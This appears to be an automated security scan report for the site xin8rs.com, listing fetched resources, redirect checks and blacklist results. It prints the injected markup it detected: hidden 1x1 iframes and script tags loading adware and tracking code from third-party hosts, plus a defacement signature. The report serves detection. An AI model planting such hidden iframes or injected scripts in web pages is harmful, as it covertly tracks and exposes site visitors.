Scanned pages/files
Request | Server response | Status |
http://xin8rs.com/ | HTTP/1.1 200 OK Date: Wed, 17 Dec 2014 07:03:27 GMT Accept-Ranges: bytes ETag: "d28d8f137b19d01:2fec" Server: Microsoft-IIS/6.0 Content-Length: 8098 Content-Location: http://xin8rs.com/Default.htm Content-Type: text/html Last-Modified: Tue, 16 Dec 2014 21:55:59 GMT X-Powered-By: ASP.NET | clean |
http://xin8rs.com/default.htm | 200 OK Content-Length: 8098 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 style: hidden src: http://hrt.dpstack.com/dealdo/event-report?type=heart_bit&partner=inff&channel=inffphp01&uid=752164945563781788&cb=2012_10_22&hid=v24300293762245519811052012111113481714&suspended=false&firstusedate=1352671752897&clv=1352369221216 <iframe src="http://hrt.dpstack.com/dealdo/event-report?type=heart_bit&partner=inff&channel=inffphp01&uid=752164945563781788&cb=2012_10_22&hid=v24300293762245519811052012111113481714&suspended=false&firstusedate=1352671752897&clv=1352369221216" style="width: 1px; height: 1px; visibility: hidden; position: fixed;"> Hidden iFrame found. size: 1x1 style: hidden src: http://www.superfish.com/ws/userdata.jsp?dlsource=hhvzmikw&userid=ntbcntbc&ver=2014.10.2.16.6 <iframe src="http://www.superfish.com/ws/userdata.jsp?dlsource=hhvzmikw&userid=ntbcntbc&ver=2014.10.2.16.6" style="border: currentcolor; left: -100px; top: -100px; width: 1px; height: 1px; visibility: hidden; position: absolute; z-index: -10;"> Deface/Content modification. The following signature was found: HaCkeD By Hawleri_hacker <!-- saved from url=(0047)http://www.crm.getweb.hu/htdocs/maintenance.php -->
<!-- Generated by F12 developer tools. This might not be an accurate representation of the original source file --> <html dir="rtl"><head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>HaCkeD By Hawleri_hacker</title> <script src="http://nps.noproblemppc.com/npsb/inj.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E" type="text/javascript" async=""></script><script src="http://www.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=190214299922000000&partnername=Information" type="text/javascript"></script><script src="http://www.superfish.com/ws/sf_preloader.js ...[8818 bytes skipped]... | ||
http://nps.noproblemppc.com/npsb/inj.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E | 200 OK Content-Length: 15396 Content-Type: application/x-javascript | clean |
http://www.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=190214299922000000&partnername=Information | 200 OK Content-Length: 13169 Content-Type: text/html | clean |
http://www.superfish.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 17 Dec 2014 07:03:28 GMT Pragma: no-cache Location: http://wwws.superfish.com/test404page.js Server: nginx Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Access-Control-Allow-Origin: * CF-Cache-Status: MISS CF-RAY: 19a142d3b1540291-SJC ClientCountry: LT Set-Cookie: __cfduid=d4058d5bf651026598e07bad51ac762181418799808; expires=Thu, 17-Dec-15 07:03:28 GMT; path=/; domain=.superfish.com; HttpOnly X-Pingback: http://wwws.superfish.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://wwws.superfish.com/test404page.js | 404 Not Found Content-Length: 28770 Content-Type: text/html | clean |
http://wwws.superfish.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/themes/SCRN/js/jquery.cycle.all.min.js?ver=4.0.1 | 200 OK Content-Length: 31614 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/themes/SCRN/js/jquery.flexslider.js?ver=1.0 | 200 OK Content-Length: 41062 Content-Type: application/x-javascript | clean |
http://www.superfish.com//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 17 Dec 2014 07:03:32 GMT Pragma: no-cache Location: http://wwws.superfish.com/www.googleadservices.com/pagead/conversion.js/ Server: nginx Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Access-Control-Allow-Origin: * CF-RAY: 19a142edd9320291-SJC ClientCountry: LT Set-Cookie: __cfduid=d79ad8c6526e6bf8d0276801a7c05c9561418799812; expires=Thu, 17-Dec-15 07:03:32 GMT; path=/; domain=.superfish.com; HttpOnly X-Pingback: http://wwws.superfish.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://wwws.superfish.com/www.googleadservices.com/pagead/conversion.js/ | 404 Not Found Content-Length: 28799 Content-Type: text/html | clean |
http://wwws.superfish.com//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 17 Dec 2014 07:03:34 GMT Pragma: no-cache Location: http://wwws.superfish.com/www.googleadservices.com/pagead/conversion.js/ Server: cloudflare-nginx Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT CF-RAY: 19a142f428a205cf-WAW Set-Cookie: __cfduid=dfe55ac5fc16f6a22c72a578737aad37d1418799813; expires=Thu, 17-Dec-15 07:03:33 GMT; path=/; domain=.superfish.com; HttpOnly X-Pingback: http://wwws.superfish.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://wwws.superfish.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.0.2 | 200 OK Content-Length: 9658 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/themes/SCRN/js/jquery.sticky.js?ver=1.0 | 200 OK Content-Length: 4627 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/themes/SCRN/js/jquery.smooth-scroll.js?ver=1.0 | 200 OK Content-Length: 1434 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/themes/SCRN/js/contact-form.js?ver=1.0 | 200 OK Content-Length: 1385 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/themes/SCRN/js/jquery.easing.1.3.js?ver=1.0 | 200 OK Content-Length: 8301 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xin8rs.com
Result:
HTTP/1.1 200 OK
Date: Wed, 17 Dec 2014 07:03:27 GMT
Accept-Ranges: bytes
ETag: "d28d8f137b19d01:2fec"
Server: Microsoft-IIS/6.0
Content-Length: 8098
Content-Location: http://xin8rs.com/Default.htm
Content-Type: text/html
Last-Modified: Tue, 16 Dec 2014 21:55:59 GMT
X-Powered-By: ASP.NET
...8098 bytes of data.
GET / HTTP/1.1
Host: xin8rs.com
Result:
HTTP/1.1 200 OK
Date: Wed, 17 Dec 2014 07:03:27 GMT
Accept-Ranges: bytes
ETag: "d28d8f137b19d01:2fec"
Server: Microsoft-IIS/6.0
Content-Length: 8098
Content-Location: http://xin8rs.com/Default.htm
Content-Type: text/html
Last-Modified: Tue, 16 Dec 2014 21:55:59 GMT
X-Powered-By: ASP.NET
...8098 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: xin8rs.com
Referer: http://www.google.com/search?q=xin8rs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xin8rs.com
Referer: http://www.google.com/search?q=xin8rs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xin8rs.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xin8rs.com/
Result: xin8rs.com is not infected or malware details are not published yet.
Result: xin8rs.com is not infected or malware details are not published yet.